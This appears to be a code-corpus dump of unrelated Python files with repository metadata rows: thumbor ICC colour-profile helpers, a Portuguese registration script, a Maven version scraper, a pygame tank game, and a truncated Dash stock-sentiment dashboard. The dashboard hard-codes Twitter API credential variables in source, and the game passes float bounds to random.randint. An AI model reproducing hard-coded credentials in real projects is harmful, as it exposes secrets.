"image/webp": ".webp",
"video/mp4": ".mp4",
"video/webm": ".webm",
"image/svg+xml": ".svg",
"image/tiff": ".tif",
"image/avif": ".avif",
"image/heif": ".heic",
}
logger = logging.getLogger("thumbor")
def deprecated(message):
def decorator_deprecated(func):
@wraps(func)
def wrapper_deprecated(*args, **kwargs):
logger.warning(
"Deprecated function %s%s",
func.__name__,
message,
)
return func(*args, **kwargs)
return wrapper_deprecated
return decorator_deprecated
def get_profile_and_color_space(icc):
    """Parse raw ICC profile bytes into (ImageCmsProfile, color-space code).

    The color space is the profile's xcolor_space with padding stripped
    (e.g. 'RGB', 'CMYK', 'GRAY'). Returns (None, None) when the bytes do
    not form a valid/parseable profile.
    """
    with BytesIO(icc) as buf:
        try:
            profile = ImageCms.ImageCmsProfile(buf)
            return profile, profile.profile.xcolor_space.strip()
        except (AttributeError, OSError, TypeError, ValueError):
            return None, None
def get_color_space(img):
    """Return the color-space name of `img`'s embedded ICC profile.

    Images without an ICC profile are treated as implicit sRGB and yield
    "RGB". Returns None when ImageCms is unavailable (optional import at the
    top of this module) or when the embedded profile cannot be parsed.
    """
    icc = img.info.get("icc_profile")
    if not icc:
        return "RGB"
    if ImageCms is None:
        return None
    _, color_space = get_profile_and_color_space(icc)
    return color_space
def ensure_srgb(img, srgb_profile=None):
    """
    Ensures that an image either has no ICC profile (and so is implicitly
    sRGB) or has an sRGB color profile. If the image is sRGB, it is returned
    unchanged. If it has a CMYK or Gray color profile, this function will
    return an image converted to sRGB. Any color profiles in other color
    spaces will return None.

    :param img: PIL image to normalise
    :param srgb_profile: optional target sRGB profile; defaults to the
        module-level DEFAULT_SRGB_PROFILE
    :raises RuntimeError: when an ICC profile is present but ImageCms is not
        available
    """
    img_info = dict(img.info)
    icc = img_info.pop("icc_profile", None)
    if not icc:
        # No embedded profile: implicitly sRGB already.
        return img

    if ImageCms is None:
        raise RuntimeError("ImageCms is required for color profile utilities")

    if srgb_profile is not None:
        srgb_profile = ImageCms.ImageCmsProfile(srgb_profile)
    else:
        srgb_profile = DEFAULT_SRGB_PROFILE

    orig_profile, color_space = get_profile_and_color_space(icc)
    if not color_space:
        # Unparseable profile: signal the caller not to trust this image.
        return None

    if color_space == "RGB":
        logger.debug("Returning img (RGB)")
        return img

    if color_space not in ("GRAY", "CMYK"):
        # Other color spaces are rare, but best not to try to convert them.
        # Upstream understands a None return as meaning it should not
        # use it for the target encoder.
        logger.debug("Cannot convert to sRGB; color space = %s", color_space)
        return None

    # Probably not possible to have an animated image with CMYK or GRAY icc
    # profile, but best leave it alone if we have one
    if getattr(img, "is_animated", False):
        return None

    if color_space == "GRAY":
        pil_mode = "L"
    else:
        pil_mode = "CMYK"

    logger.debug("Converting from %s to sRGB", color_space)

    transform = ImageCms.ImageCmsTransform(
        orig_profile,
        srgb_profile,
        pil_mode,
        "RGBA",
        intent=ImageCms.Intent.RELATIVE_COLORIMETRIC,
        flags=TRANSFORM_FLAGS,
    )

    # Paste onto a white background so transparent regions convert cleanly,
    # transform into RGBA, then drop the alpha channel.
    src_im = Image.new(pil_mode, img.size, "white")
    src_im.paste(img)

    dst_im = Image.new("RGBA", img.size, "white")
    dst_im.info = img_info
    dst_im = transform.apply(src_im, dst_im)
    dst_im = dst_im.convert("RGB")
    dst_im.info = img_info
    return dst_im
|
thumbor/thumbor
|
thumbor/utils.py
|
utils.py
|
py
| 4,272 |
python
|
en
|
code
| 9,707 |
github-code
|
6
|
36043542856
|
# Interactive roster: collect name / sex / age records, then report counts,
# the average age, the registered women and everyone older than the average.
pessoas = []
media = cont = 0
while True:
    pessoas.append({"nome": input("Nome: ").title().strip()})
    pessoas[cont]["sexo"] = input("Sexo [F/M]: ").upper().strip()
    # BUG FIX: the original tested `not in "FM"`; since "" in "FM" is True,
    # an empty answer passed validation. Test against a tuple instead.
    while pessoas[cont]["sexo"] not in ("F", "M"):
        print("ERRO! Por favor, digite apenas M ou F.")
        pessoas[cont]["sexo"] = input("Sexo [F/M]: ").upper().strip()
    pessoas[cont]["idade"] = int(input("Idade: "))
    media += pessoas[cont]["idade"]
    cont += 1
    # BUG FIX: normalise to lower case — the original accepted "N"/"S" in
    # validation but only broke the loop on a lower-case "n", and the
    # empty string also slipped through `in "snSN"`.
    es = input("Quer continuar?[S/N]: ").strip().lower()
    while es not in ("s", "n"):
        print("ERRO! Responda apenas S ou N.")
        es = input("Quer continuar?[S/N]: ").strip().lower()
    if es == "n":
        break
media /= len(pessoas)
print("=-" * 35)
print(f"A) Foram cadastradas {len(pessoas)} pessoas.")
print(f"B) A média de idade é de {media} anos..")
print("C) As mulheres cadstrads foram:", end=" ")
for c in pessoas:
    if c["sexo"] == "F":
        print(c["nome"], end=" ")
print()
print("D) Lista de pessoas com a idade acima da média:")
for c in pessoas:
    if c["idade"] > media:
        for k, v in c.items():
            print(f"{k:>8} = {v:<14}", end="")
        print()
print("<< ENCERRADO >>")
|
amandasales/Cadastro
|
cadastro.py
|
cadastro.py
|
py
| 1,185 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
2026784639
|
import msvcrt
import zipfile
import threading
from selenium import webdriver
from selenium.webdriver.edge.options import Options
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor,wait, FIRST_COMPLETED, ALL_COMPLETED
resultList = []
unfoundList = []
alltask = []
def main():
    """Scan an .aab archive for bundled "*.version" marker files and look up
    the latest release of each dependency on mvnrepository.com, spawning one
    worker thread per dependency.
    """
    # NOTE(review): hard-coded local path — parametrise before reuse.
    file = 'C:\\Users\\niu\Desktop\\上传\CartoonCustomSticker.aab'
    dependenciesDict = {}
    threadList = []
    if zipfile.is_zipfile(file):
        print()
        z = zipfile.ZipFile(file, 'r')
        namelist = z.namelist()
        pool = ThreadPoolExecutor(len(namelist))
        for zFile in namelist:
            if zFile.endswith('.version'):
                # print('"' + zFile.split('/').pop()[:-8] + '":"' + str(z.read(zFile), encoding='utf-8').strip() + '",')
                # print(zFile.split('/').pop()[:-8])
                # Marker files are named "<group>_<artifact>.version".
                pair = zFile.split('/').pop()[:-8].split('_')
                # pool.submit(getLatestVersion,pair[0],pair[1])
                # alltask.append(task)
                t = threading.Thread(target=getLatestVersion,args=(pair[0],pair[1]))
                t.start()
                # threadList.append(t)
                # getLatestVersion(pair[0],pair[1])
                # dependenciesDict[pair[0]] = pair[1]
        print('查询中...')
        # t.start()
        # t.join()
        # wait(alltask,return_when=ALL_COMPLETED)
        # for group, artifact in dependenciesDict.items():
        #     thread = threading.Thread(target=getLatestVersion, args=(group, artifact))
        #     getLatestVersion(group, artifact)
        #     threadList.append(thread)
        # for thread in threadList:
        #     thread.start()
        # for thread in threadList:
        #     thread.join()
        # NOTE(review): the worker threads are never joined (join code above
        # is commented out), so the summaries below may print before all
        # lookups finish — confirm whether that is intended.
        print('结果如下:')
        for item in resultList:
            print(item)
        print('\n未查询到的依赖如下:')
        print(unfoundList)
        msvcrt.getch()
def getLatestVersion(group_id, artifact_id):
    """Scrape mvnrepository.com for the newest release version of
    group_id:artifact_id, appending a formatted line to the global
    resultList on success or the coordinate to unfoundList on failure.
    Runs inside a worker thread (list.append is atomic under the GIL).
    """
    global resultList
    global unfoundList
    url = f'https://mvnrepository.com/artifact/{group_id}/{artifact_id}'
    # url = 'https://mvnrepository.com/artifact/androidx.appcompat/appcompat' # sample library URL
    options = Options()
    options.use_chromium = True
    options.add_argument("headless")
    options.add_argument("disable-gpu")
    options.add_argument(
        "user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3")
    driver = webdriver.Edge(options=options)  # Edge browser is used here
    driver.get(url)
    html = driver.page_source
    # print(f'groupId:{group_id}, artifact:{artifact_id}')
    # print(html)
    soup = BeautifulSoup(html, 'html.parser')
    # The first "release" button on the artifact page is the latest version.
    version_element = soup.find('a', {'class': 'vbtn release'})
    if not version_element is None:
        latest_version = version_element.text.strip()
        print(f'"{group_id}:{artifact_id}":"{latest_version}",')
        resultList.append(f'"{group_id}:{artifact_id}":"{latest_version}",')
    else:
        print(f'{group_id}_{artifact_id}')
        unfoundList.append(f'{group_id}:{artifact_id}')
    driver.quit()
main()
|
Nienter/mypy
|
personal/getNewestVersion.py
|
getNewestVersion.py
|
py
| 3,123 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23261593645
|
import pygame
import math
import random
#CONST
SCREENWIDTH=1280
SCREENHEIGHT=720

# pygame setup
pygame.init()
screen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))
clock = pygame.time.Clock()
running = True
dt = 0
FPS=60
pygame.display.set_caption('TANK')

#variables
# Parallel lists holding the x/y coordinates of spawned targets.
x_target=[]
y_target=[]
checkVar =1
showHelp=False

#functions
#Start screen
isStartingScreen=True
def start_Screen():
    """Draw the title screen ("TANKS" plus a continue prompt) on the global
    screen surface.

    NOTE(review): both rects come from screen.get_rect(center=...), i.e. the
    *screen's* rect recentred, not the rendered text's — positions look
    hand-tuned; confirm before changing.
    """
    screen.fill('white')
    font = pygame.font.Font('fonts/TitleFont.ttf', 150)
    sfont = pygame.font.Font('fonts/TitleFont.ttf', 50)
    title = font.render('TANKS',True,'black','white')
    titleRect = screen.get_rect(center=(SCREENWIDTH//2+SCREENWIDTH//3+30,SCREENHEIGHT//2+SCREENHEIGHT//3))
    subtext= sfont.render("PRESS 'E' TO CONTINUE", True,'black','white')
    subRect = screen.get_rect(center=(SCREENWIDTH//2+SCREENWIDTH//3,SCREENHEIGHT//2+SCREENHEIGHT//3+200))
    screen.blit(title, titleRect)
    screen.blit(subtext, subRect)
class Target:
    """A shootable target. Positions live in the module-level x_target /
    y_target parallel lists rather than on instances."""

    def __init__(self,x,y):
        self.x = int(x)
        self.y = int(y)

    #spawnTarget
    def spawnTarget(self):
        """Append 10 random on-screen positions to the global coordinate lists.

        NOTE(review): SCREENWIDTH*0.9 / SCREENHEIGHT*0.8 are floats;
        random.randint requires integers and rejects floats on modern
        Python — confirm intended bounds.
        """
        for i in range(10):
            x= random.randint(SCREENWIDTH//2,SCREENWIDTH*0.9)
            y = random.randint(50,SCREENHEIGHT*0.8)
            x_target.append(x)
            y_target.append(y)

    #drawTarget
    def drawTarget(self):
        """Blit the target sprite at every stored coordinate pair."""
        targetIMG = pygame.image.load('images/target.png').convert_alpha()
        for i in range(0,10):
            screen.blit(targetIMG,(x_target[i],y_target[i]))
#classes
class Player:
    """The tank: movement, turret aiming, projectile physics and hit
    detection against the module-level x_target / y_target lists."""

    # NOTE(review): this class attribute is shadowed by the global KEYS that
    # the main loop refreshes every frame; the methods below read the global.
    KEYS = pygame.key.get_pressed()

    def __init__(self, x, y, alpha, g, V0, t, dt, isShoted, score, bx, by):
        self.x = int(x)              # tank position (top-left corner)
        self.y = int(y)
        self.alpha = int(alpha)      # barrel angle in degrees, clamped to [0, 90]
        self.g = g                   # gravity constant
        self.V0 = V0                 # muzzle velocity
        self.t = t                   # time since the current shot was fired
        self.dt = dt
        self.isShoted = isShoted     # True while a shell is in flight
        self.score = score
        self.bx = bx                 # shell position
        self.by = by

    def draw(self):
        """Draw the tank body sprite at the tank's position."""
        tank = pygame.image.load('images/Tank.png').convert_alpha()
        tank = pygame.transform.scale(tank, (65, 40))
        screen.blit(tank, (self.x, self.y))

    def move(self):
        """Move left/right with A/D while no shell is in flight."""
        if not self.isShoted:
            if KEYS[pygame.K_a]:
                self.x -= 3
            if KEYS[pygame.K_d]:
                self.x += 3

    def tankTurret(self):
        """Aim the barrel with W/S (clamped to [0, 90] degrees) and draw it.

        Publishes the muzzle tip through the globals turretPointX /
        turretPointY, which shoot() uses as the shell's launch point.
        """
        global turretPointX, turretPointY
        if not self.isShoted:
            if KEYS[pygame.K_w]:
                self.alpha += 1
            if KEYS[pygame.K_s]:
                self.alpha -= 1
            if self.alpha <= 0:
                self.alpha = 0
            if self.alpha >= 90:
                self.alpha = 90
        theta = math.radians(self.alpha)
        # Barrel tip, 40 px from the pivot at (x+35, y+5); screen y grows down.
        end_x = (self.x + 35) + 40 * math.cos(theta)
        end_y = (self.y + 5) - 40 * math.sin(theta)
        pygame.draw.line(screen, 'black', (self.x + 35, self.y + 5), (end_x, end_y), 5)
        pygame.draw.circle(screen, 'black', (end_x, end_y), 2)
        pygame.draw.circle(screen, 'black', (self.x + 35, self.y + 5), 2)
        turretPointX, turretPointY = end_x, end_y

    def wallCollision(self):
        """Clamp the tank to the playable strip on the left of the screen."""
        if self.x <= 0:
            self.x = 0
        if self.x >= 231:
            self.x = 231

    def shoot(self):
        """Advance and draw the shell using projectile-motion equations.

        x(t) = x0 + V0*cos(a)*t
        y(t) = y0 - V0*sin(a)*t + g*t^2/2   (screen y grows downward)
        """
        theta = math.radians(self.alpha)
        V0x = self.V0 * math.cos(theta)
        V0y = self.V0 * math.sin(theta)
        self.bx = turretPointX + V0x * self.t
        # BUGFIX: the gravity drop term is 0.5*g*t**2; the original added g
        # and t**2 ("+0.5*self.g+self.t**2") instead of multiplying them,
        # which distorted the trajectory.
        self.by = turretPointY - V0y * self.t + 0.5 * self.g * self.t ** 2
        pygame.draw.circle(screen, 'black', (int(self.bx), int(self.by)), 5)
        if self.bx < 0 or self.bx > 1280 or self.by > 720:
            # Shell left the screen: park it back on the tank and re-arm.
            self.bx = (self.x + 35)
            self.by = (self.y + 5)
            self.isShoted = False
            self.t = 0

    def checkColl(self):
        """Score a hit when the shell is inside a target's 50x50 box, then
        park that target off-screen so it cannot be hit again."""
        for i in range(10):
            if (x_target[i] <= self.bx <= x_target[i] + 50
                    and y_target[i] <= self.by <= y_target[i] + 50):
                self.score += 1
                x_target[i] = 2000
                y_target[i] = 2000
class gameGUI:
    """Draws the in-game HUD (ground, help hint, angle/power/score readouts)
    and the optional help overlay. Reads the module-level `player` for the
    current angle, power and score."""
    def __init__(self,x,y):
        self.x = int(x)
        self.y = int(y)
    def draw(self):
        """Draw the ground strip, the 'Q for help' hint and the HUD text."""
        # NOTE(review): images and fonts are reloaded on every call; caching
        # them (as Target could) would avoid per-frame disk reads.
        ground = pygame.image.load('images/ground.png').convert_alpha()
        ground = pygame.transform.scale(ground, (300,300))
        screen.blit(ground, (0,SCREENHEIGHT*0.62))
        font = pygame.font.Font('fonts/TitleFont.ttf', 30)
        Q = pygame.image.load('images/Q.png').convert_alpha()
        Q = pygame.transform.scale(Q, (50,50))
        screen.blit(Q, (SCREENWIDTH*0.75,SCREENHEIGHT*0.9+5))
        # All *Rect values below come from screen.get_rect(center=...), i.e.
        # they position the text relative to the full-window rect.
        Qtxt = font.render("PRESS FOR HELP ", True, 'black','white')
        QtxtRect = screen.get_rect(center=(SCREENWIDTH+SCREENWIDTH-900,SCREENHEIGHT+SCREENHEIGHT-420))
        screen.blit(Qtxt, QtxtRect)
        angle = font.render("ANGLE "+str(player.alpha), True, 'black','white')
        angleRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-550))
        screen.blit(angle, angleRect)
        power = font.render("POWER "+str(player.V0), True, 'black','white')
        powerRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-500))
        screen.blit(power, powerRect)
        scoreText = font.render("SCORE "+str(player.score), True, 'black','white')
        scoreRect = screen.get_rect(center=(SCREENWIDTH//2+20,SCREENHEIGHT+SCREENHEIGHT-450))
        screen.blit(scoreText, scoreRect)
    def helpMenu(self):
        """Draw the help overlay: power-up/down keys and WASD controls."""
        pUD = pygame.image.load('images/powerUPpowerDown.png').convert_alpha()
        pUD = pygame.transform.scale(pUD, (260,130))
        screen.blit(pUD, (0,SCREENHEIGHT*0.1))
        font = pygame.font.Font('fonts/TitleFont.ttf', 30)
        ptext = font.render("POWER +1 ", True, 'black','white')
        ptextRect = screen.get_rect(center=(SCREENWIDTH-530,SCREENHEIGHT-268))
        screen.blit(ptext, ptextRect)
        ptext2 = font.render("POWER -1 ", True, 'black','white')
        ptextRect2 = screen.get_rect(center=(SCREENWIDTH-530,SCREENHEIGHT-213))
        screen.blit(ptext2, ptextRect2)
        wasd = pygame.image.load('images/WASD.png').convert_alpha()
        wasd = pygame.transform.scale(wasd, (260,130))
        screen.blit(wasd, (30,SCREENHEIGHT*0.2+50))
        WASDT1 = font.render("W,S- ANGLE", True, 'black','white')
        ptextRect = screen.get_rect(center=(SCREENWIDTH-450,SCREENHEIGHT-140))
        screen.blit(WASDT1, ptextRect)
        WASDT2 = font.render("A,D- MOVE", True, 'black','white')
        ptextRect = screen.get_rect(center=(SCREENWIDTH-450,SCREENHEIGHT-90))
        screen.blit(WASDT2, ptextRect)
#class variables
player = Player(50, SCREENHEIGHT*0.6, 0, 9.81, 10, 0, 0.01, False, 0, 0, 0)
gui = gameGUI(0, SCREENHEIGHT-200)
target = Target(0, 0)

# Main game loop: poll input, draw either the title screen or the game,
# then flip the display at FPS frames per second.
while running:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    #Controls -- polled once per frame; Player methods read this global.
    KEYS = pygame.key.get_pressed()
    if KEYS[pygame.K_ESCAPE]:
        running = False
    if KEYS[pygame.K_q]:
        # NOTE(review): toggling on key *state* flips every frame while Q is
        # held; an event-based KEYDOWN toggle would behave more predictably.
        showHelp = not showHelp
    if KEYS[pygame.K_e]:
        isStartingScreen = False
    if KEYS[pygame.K_SPACE]:
        player.isShoted = True
    if not player.isShoted:
        # Adjust muzzle velocity only while no shell is in flight; clamp to [10, 50].
        if KEYS[pygame.K_UP]:
            player.V0 += 1
        if KEYS[pygame.K_DOWN]:
            player.V0 -= 1
        if player.V0 <= 10:
            player.V0 = 10
        if player.V0 >= 50:
            player.V0 = 50
    #GAME section
    if isStartingScreen:
        start_Screen()
    else:
        screen.fill('white')
        gui.draw()
        # BUGFIX: spawn only when no targets exist yet. The original called
        # spawnTarget() every frame, appending 10 new coordinates per frame
        # and growing x_target / y_target without bound.
        if not x_target:
            target.spawnTarget()
        target.drawTarget()
        if player.score/10 == checkVar and player.score != 0:
            # Level up: replace the whole target set with a fresh one.
            x_target.clear()
            y_target.clear()
            target.spawnTarget()
            target.drawTarget()
            checkVar += 1
        if showHelp:
            gui.helpMenu()
        player.checkColl()
        player.draw()
        player.move()
        player.tankTurret()
        player.wallCollision()
        if player.isShoted:
            player.shoot()
            player.t += 0.2
    #pygame essentials
    pygame.display.flip()
    dt = clock.tick(FPS) / 1000
pygame.quit()
|
stefanstojkoviic/Tenkici
|
game.py
|
game.py
|
py
| 8,210 |
python
|
en
|
code
| 0 |
github-code
|
6
|
72136709947
|
#Plots
import re
import plotly.express as px
#DASHBOARD
import dash
import dash_html_components as html
import dash_core_components as dcc
from dash.dependencies import Input, Output
import dash_bootstrap_components as dbc
import dash_table
from dash.exceptions import PreventUpdate
import tweepy
##########
from data import *
from update_db import *
from graphs import *
from semanticsearch import get_similar_sentences
app = dash.Dash(__name__, external_stylesheets=[dbc.themes.BOOTSTRAP])
server = app.server # for Heroku deployment
# Inline styles for the dcc.Tabs header bar and its individual tabs.
tabs_styles = {
    # 'height': '44px',
    'background': '#393939'
}
# Style for an unselected tab.
tab_style = {
    'borderBottom': '1px solid #d6d6d6',
    'padding': '6px',
    'fontWeight': 'bold'
}
# Style applied to the currently selected tab.
tab_selected_style = {
    'borderTop': '1px solid #d6d6d6',
    'borderBottom': '1px solid #d6d6d6',
    'backgroundColor': '#119DFF',
    'color': 'white',
    'padding': '6px'
}
################################ DATA PROCESSING #########################################
stockprice_number_of_days = '8d'  # lookback window passed to get_stockpricedata
stocks_screenerview = pd.read_csv('socialmediadata/stocks_screenerview_sectors.csv')
# NOTE(review): Twitter API credentials are hard-coded here (and partially
# blank); they should be loaded from environment variables or a secrets
# store rather than committed to source.
consumer_key = ""
consumer_secret = ""
access_token = "326146455-"
access_token_secret = ""
# Creating the authentication object
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
# Setting your access token and secret
auth.set_access_token(access_token, access_token_secret)
# Creating the API object by passing in auth information
api = tweepy.API(auth)
def top_words_on_key(df, colum_name, Source, key, keytype, top_n):
    """Return the top_n most frequent @mentions, #hashtags or $tickers.

    The text column is joined into one string, split on spaces, and scanned
    with a regex chosen by *key* ('@' for mentions, '#' for hashtags,
    anything else means '$' tickers). Returns a DataFrame whose columns are
    the token, its 'count', plus constant 'Source' and 'keytype' columns.
    """
    tokens = " ".join(df[colum_name]).split(' ')
    if key == '@':
        pattern = r'[@][A-Za-z]+'
    elif key == '#':
        pattern = r'[#][A-Za-z]+'
    else:
        pattern = r'[$][A-Za-z]+'
    # The regex is applied to the repr of the token list, as in the original.
    matches = re.findall(pattern, str(tokens))
    top = pd.Series(matches).value_counts()[:top_n].to_frame('count').reset_index()
    top['Source'] = Source
    top['keytype'] = keytype
    return top
LEFT_COLUMN = dbc.Navbar(
[
dbc.Row(
[
dbc.Col(html.H4(" Stock Market Insights"),md=6),
html.Br(),
dbc.Col(
html.Label(" Stock Ticker:"),md=2),
dbc.Col(
dcc.Dropdown(id='dropdown',options=[
{'label': 'Microsoft (MSFT)', 'value': 'MSFT'},
{'label': 'Tesla (TSLA)', 'value': 'TSLA'},
{'label': 'TMobile (TMUS)', 'value': 'TMUS'}],value='TMUS',clearable=False
),md=4)
]
)
]
)
def homepage_stockmarket_fig():
namedent_agg_sorted = stocks_screenerview.groupby(['Sector']).apply(
lambda x: x.sort_values(['Volume'], ascending=False)).reset_index(
drop=True)
namedent_agg_top5_df = namedent_agg_sorted.groupby(['Sector']).head(5)
namedent_agg_top5_df['Ticker_Company'] = namedent_agg_top5_df['Ticker'] + '(' + namedent_agg_top5_df[
'Company'] + ')'
stockvolume_sunburst_fig = px.sunburst(namedent_agg_top5_df, path=['Sector', 'Ticker'], values='Volume',
hover_name="Ticker_Company",color_discrete_sequence=px.colors.qualitative.Pastel)
stockvolume_sunburst_fig.update_layout(
title=dict(text="<b>Top Tickers based on <br> Actual Stock Volume</b>"),
plot_bgcolor='#5B5959',
font=dict(size=13)
)
tweet_df = get_data_from_db( db_table_name = 'socialmediadata.stock_twitterdata')
reddit_df = get_data_from_db(db_table_name='socialmediadata.stock_redditdata')
reddit_top_tickers = top_words_on_key(reddit_df, 'text', 'Reddit', '$', 'Tickers', 5)
twitter_top_tickers = top_words_on_key(tweet_df, 'text', 'Twitter', '$', 'Tickers', 5)
top_social_media = pd.concat([reddit_top_tickers, twitter_top_tickers])
top_tickers_socialmedia_sunburstfig = px.sunburst(top_social_media, path=['Source','index'],
values='count',color_discrete_sequence=px.colors.qualitative.Pastel)
top_tickers_socialmedia_sunburstfig.update_layout(
title=dict(text="<b>Top Tickers based on <br> Volume(No Of Tweets) on Social Media</b>"),
#treemapcolorway=['#0000A0', '#E6A000', '#009FEB'],
plot_bgcolor='#5B5959',
font=dict(size=12)
)
df_top_reddit_users = pd.Series(reddit_df['user']).value_counts()[:5].to_frame('count').reset_index()
df_top_reddit_users['Source']='Reddit'
df_top_twitter_users = pd.Series(tweet_df['user']).value_counts()[:5].to_frame('count').reset_index()
df_top_twitter_users['Source'] = 'Twitter'
top_social_users = pd.concat([df_top_reddit_users, df_top_twitter_users])
top_users_socialmedia_sunburstfig = px.bar(top_social_users, x='count', y='index', color="Source", barmode='group')
top_users_socialmedia_sunburstfig.update_layout(
title=dict(text="<b>Top Users on Social Media</b>"),
# treemapcolorway=['#0000A0', '#E6A000', '#009FEB'],
plot_bgcolor='#5B5959',
font=dict(size=12)
)
final_namedentitydf = pd.read_csv('socialmediadata/namedentitydf.csv')
socialmedia_namedentity_fig = px.treemap(final_namedentitydf, path=['source', 'Label', 'Text'],
color_discrete_sequence=px.colors.qualitative.Pastel,values='count')
socialmedia_namedentity_fig.update_layout(
title=dict(text="<b>Stock News Named Entities from Twitter,Reddit,News and Blogs </b>"),
#treemapcolorway=['#0000A0', '#E6A000', '#009FEB'],
font=dict(size=14)
)
return stockvolume_sunburst_fig,top_tickers_socialmedia_sunburstfig,socialmedia_namedentity_fig,top_users_socialmedia_sunburstfig
stockvolume_sunburst_fig,top_tickers_socialmedia_sunburstfig,\
socialmedia_namedentity_fig,top_users_socialmedia_sunburstfig = homepage_stockmarket_fig()
HOME_BODY = [
dbc.Row(
[
dbc.Col(dcc.Graph(id="stockvolume_sunburst_fig",figure=stockvolume_sunburst_fig),width=4),
dbc.Col(dcc.Graph(id="top_tickers_socialmedia_sunburstfig",figure=top_tickers_socialmedia_sunburstfig),width=4),
dbc.Col(dcc.Graph(id="top_users_socialmedia_sunburstfig",figure=top_users_socialmedia_sunburstfig),width=4)
]
),
dbc.Row(
[
dbc.Col(dcc.Graph(id="socialmedia_namedentity_fig", figure=socialmedia_namedentity_fig), width=12)
]
),
html.Br(),
dbc.Col(html.H2("Semantic Search on Twitter,Reddit,News and Blogs"),md=11),
html.Br(),
dbc.Row(
[
dbc.Col(dbc.Card(dcc.Input(id='semantic_search', type="text", value="Stock news related to Healthcare Sector", placeholder="Twitter Search")),
md=8)
]),
dbc.Row(
[
dbc.Col(dbc.Card(html.Label(id='semanticsearchtable')), width=11)
]),
html.Br(),
dbc.Col(html.H2("Real Time Twitter Streaming Insights"),md=11),
html.Br(),
dbc.Row(
[
dbc.Col(dcc.Input(id='twitter_search',type="text", value="stockmarket",placeholder="Twitter Search"), md=8)
]),
html.Br(),
dcc.Interval(
id='interval-component',
interval=1 * 80000, # in milliseconds
n_intervals=0
),
dbc.Row(
[
dbc.Col(dbc.Card(html.Label(id='tweettable')), width=7)
])
]
SOCIALMEDIA_BODY = [
html.Br(),
dbc.Row(
[
dbc.Col(dbc.Card(html.Div(id='stockdescription')), width=12)
],
),
dbc.Row(
[
#dbc.Col(dcc.Graph(id="tophashtagmentionfunnelchart"),width=3),
dbc.Col(dbc.Spinner(dcc.Graph(id="tickertopmentionssunburstplot"), type = "grow"),width=4),
dbc.Col(dbc.Spinner(dcc.Graph(id="stockfundchart"), type = "grow"),width=7)
],
),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="stockchart"), type="grow"), width=11)
],
),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentlinechart"), type = "grow"),width=11)
],
),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentfunnelallchart"), type="grow"),width=4),
dbc.Col(dbc.Spinner(dcc.Graph(id="stocksentimentfunnelchart"), type="grow"),width=8)
],
),
dbc.Row(
[
dbc.Col(dcc.RangeSlider(id='sentiment-slider',min=-1,max=1,step=0.2,value=[0, 0.5]),width=4),
],
),
dbc.Row(
[
dbc.Col(
[
dbc.Row(dbc.Spinner(dcc.Graph(id="twitterwordcloudplot"),type = "grow")),
dbc.Row(dbc.Spinner(dcc.Graph(id="redditwordcloudplot"),type = "grow"))
],width=3
),
dbc.Col(dbc.Card(html.Label(id='sentimenttable')), width=7)
]
),
dbc.Col(html.H2("Real Time Tweets from STOCKTWITS"),md=11),
dbc.Col(dbc.Spinner(html.Label(id='stocktwits-output'),type = "grow"), width=11)
]
NEWS_BODY = [
dbc.Col(dbc.Spinner(dbc.Card(html.Label(id='newsarticletable'))), width=11),
dbc.Row(
[
dbc.Col(dbc.Spinner(dcc.Graph(id="newsngramfig")),width=4),
dbc.Col(dbc.Spinner(dcc.Graph(id="newswordcloudfig")), width=4)
],
),
dbc.Col(dbc.Spinner(dbc.Card(dcc.Graph(id='newsnamedentity'))),width=11)
]
BODY = dbc.Container\
([
dbc.Row(
dbc.Col(
dcc.Tabs(id="tabs-styled-with-inline", value='home',
children=[
dcc.Tab(label='HOME', value='home',style=tab_style, selected_style=tab_selected_style),
dcc.Tab(label='TICKER-SOCIALMEDIA SENTIMENTS', value='socialmedia',style=tab_style, selected_style=tab_selected_style),
dcc.Tab(label='TICKER-NEWS ', value='news',style=tab_style, selected_style=tab_selected_style),
]
),width={"size": 8, "offset": 2},md={"size": 10, "offset": 1},lg={"size": 12, "offset": 0}
),className="bottom32"),
#html.Div(dcc.Loading(html.Div(id="main_div"),type="cube", style={"marginTop": "150px"}),style={"minHeight": "500px"})
html.Div(html.Div(id="main_div"))
], style={"maxWidth": "1340px"}
)
app.layout = html.Div(children=[LEFT_COLUMN,BODY])
###########################################################################################
##########################################CALLBACKS########################################
###########################################################################################
@app.callback([Output('stockdescription', 'children'),
Output('stockfundchart', 'figure'),
Output('stockchart', 'figure')
],
Input('dropdown', 'value')
)
def update_graphs(value):
#####
stockdescription, stock_fundament = get_stock_fundamentals(value)
stock_fund_treefig = px.treemap(stock_fundament, path=['index', 'value'], color_discrete_sequence = px.colors.qualitative.Pastel,height=400)
data = get_stockpricedata(value, stockprice_number_of_days)
stock_fig = candlestick_chart(data)
return stockdescription, stock_fund_treefig,stock_fig
@app.callback(
Output('tickertopmentionssunburstplot', 'figure'),
Input('dropdown', 'value')
)
def update_graphs(value):
#####
tweet_df = get_data_from_db(db_table_name='socialmediadata.ticker_twitterdata1')
reddit_df = get_data_from_db(db_table_name='socialmediadata.ticker_redditdata')
tweet_df = tweet_df[tweet_df['ticker'] == '$'+value]
reddit_df = reddit_df[reddit_df['ticker'] == value]
tweet_df['DataSource'] = 'Twitter'
reddit_df['DataSource'] = 'Reddit'
reddit_top_mentions = top_words_on_key(reddit_df, 'text', 'Reddit', '@', 'Mentions', 5)
reddit_top_hashtags = top_words_on_key(reddit_df, 'text', 'Reddit', '#', 'Hashtags', 5)
twitter_top_mentions = top_words_on_key(tweet_df, 'text', 'Twitter', '@', 'Mentions', 5)
twitter_top_hashtags = top_words_on_key(tweet_df, 'text', 'Twitter', '#', 'Hashtags', 5)
top_social_media = pd.concat(
[reddit_top_mentions, reddit_top_hashtags, twitter_top_mentions, twitter_top_hashtags])
